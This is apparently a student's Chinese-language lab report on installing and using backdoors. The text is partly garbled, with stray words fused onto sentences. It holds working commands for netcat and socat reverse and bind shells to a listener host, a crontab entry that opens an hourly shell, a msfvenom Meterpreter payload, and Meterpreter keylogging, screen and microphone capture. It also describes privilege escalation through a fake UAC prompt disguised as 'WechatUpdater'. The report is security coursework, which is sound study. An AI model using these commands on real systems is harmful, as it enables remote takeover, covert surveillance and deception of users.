(1)例舉你能想到的一個後門進入到你係統中的可能方式?
答:下載並安裝某個程序,這個程序能夠正常的而且完整的爲咱們提供服務,可是在開發改程序時可能會設計了一個後門,咱們安裝程序的過程當中也將該後門也裝入了咱們的系統中。linux
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?
答:win:做爲一個程序、一個可執行文件,當咱們在運行該程序或者該可執行文件時,後門就能夠被開啓;在本次試驗中還有經過設置Windows->控制面板->管理工具->任務計劃程序,新建任務來實現後門的開啓。 Linux:經過crontab定時任務來啓動。web
(3)Meterpreter有哪些給你映像深入的功能?
答:一旦控制了靶機,那麼Meterpreter的功能很是強大,不止系統命令、核心命令,甚至還有一些用戶接口,並且若是沒有殺毒軟件很是容易使用,也就是說稍微進行提高,那麼殺毒軟件也檢測不出來,很是容易被攻擊,一旦被攻擊,能夠經過擊鍵記錄獲取我的信息,如密碼、身份證號碼等等,還可使用攝像頭,電視劇裏用攝像頭監視別人的橋段居然能夠這麼簡單的實現,太危險了。shell
(4)如何發現本身有系統有沒有被安裝後門?
答:首先一些殺毒軟件的安裝仍是很是重要,低端的後門能夠被系統的防火牆、殺毒軟件還有入侵檢測系統均可以查出;高端一點的後門應該就要下載專門的檢測工具了,同時在上網搜索的過程當中,發現了一種方法,在這裏分享給你們,點擊跳轉。windows
此次實驗頗有趣,過了一把當「黑客」的癮,可是與此同時讓我有了不少擔心,看起來很是安全的電腦潛藏着這麼多危險,不經意間下載的一個軟件可能就會讓你的信息毫無藏身之處,信息化的時代帶來了不少便捷與此同時一些安全問題也的確不容忽視。安全
ncat.exe -l -p 5339
。-l
是監聽-p
是端口,此處我開啓的是本機5339號端口。nc 172.30.1.92 5339 -e /bin/sh
,此處IP地址爲主機的IP地址。ls
,cd
等,結果以下圖:nc -l -p 5339
。ncat.exe -e cmd.exe ip_of_linux 5339
crontab -e
,其中-e
表示編輯。20 * * * * /bin/netcat 172.30.1.92 5339 -e /bin/sh
,(該指令是在每一個小時的第20分鐘執行後面的指令)保存並退出,配置生效,能夠經過crontab -l
來查看。當我在主機172.30.1.92的5339端口用nc偵聽,那麼到了第20分時就會得到虛擬機的shell,結果以下:下載socat。tcp
Windows->控制面板->管理工具->任務計劃程序->建立任務,觸發器設置爲工做站鎖定時以及對全部用戶(以下圖)。
編輯器
在操做中的程序或腳本里選擇下載的socat.exe的路徑,添加參數中填入tcp-listen:5339 exec:cmd.exe,pty,stderr
,該命令把cmd綁定到5339端口,同時把cmd的Stderr復位到stdout(以下圖)。 工具
按win+L鍵鎖定計算機,再次開啓,以前建立的任務已經開始運行了。測試
在Kali中輸入socat - tcp:172.30.1.92:5339,就能夠得到靶機的shell了,以下圖所示:
url
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=5339 -f exe > 20155339.exe
,其中IP爲Kali的IP地址,稍做等待就會生成20155339.exe後門文件。
將其經過nc,傳送到主機,在Windows中使用命令ncat.exe -l 5339 > 20155339.exe
,在Kali中使用命令:。 nc 172.30.1.92 5339 < 20155339.exe
,這樣就傳送過來了。
爲了驗證是否必須在傳送的目錄才能夠,我將其轉移到另一個目錄下,因此如下實驗我是在另外一個盤裏面弄的,經驗證在別的目錄下也是能夠的。
在Kali中輸入以下命令:msfconsole
,set payload windows/meterpreter/reverse_tcp
,show options
獲得下圖所示:
能夠看到IP和端口都須要設置(由於此處的IP和端口須要與上面生成後門文件時的一致。因此set LHOST 192.168.224.129
,set LPORT 5339
,再次show options
,獲得以下圖所示,即正確:
輸入exploit
。
在Windows中雙擊運行20155339.exe,Kali獲得shell,用dir
命令測試,獲得以下圖所示:
-記錄擊鍵,keyscan_start
開始記錄,keyscan_dump
顯示出擊鍵內容,keyscan_stop
中止記錄,記錄成功。
screenshot
命令用於截圖,截圖成功。
record_mic
命令用於錄製音頻,錄製成功。
webcam_snap
拍攝,可是未成功。
getsystem
指令進行提權。
getsystem
命令時,若是出現...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
,則說明自動提權成功,當這種命令下出現異常,則說明須要遷移到一個以SYSTEM
系統權限運行的進程中,這樣就有不少方法,方法一就是能夠利用溢出漏洞模塊提權,如ms13_053,ms14_058,ms16_016,ms16_032等,用windows提權漏洞提權時,會直接返回高權限meterpreter shell,因此不須要再執行getsystem命令;方法二是AlwaysInstallElevated
提權,AlwaysInstallElevated
是微軟容許非受權用戶以SYSTEM
權限運行安裝文件(MSI
)的一種設置,還有一個方法就是用exploit/windows/local/ask,模擬一個UAC確認窗口,欺騙用戶點擊,從而獲取權限。這裏我將應用程序的名字(FILENAME參數)設置成爲「WechatUpdater」,比較引誘你們點擊,具體步驟以下圖3,這個過程當中Windows會收到下圖4所示窗口,須要點擊確認。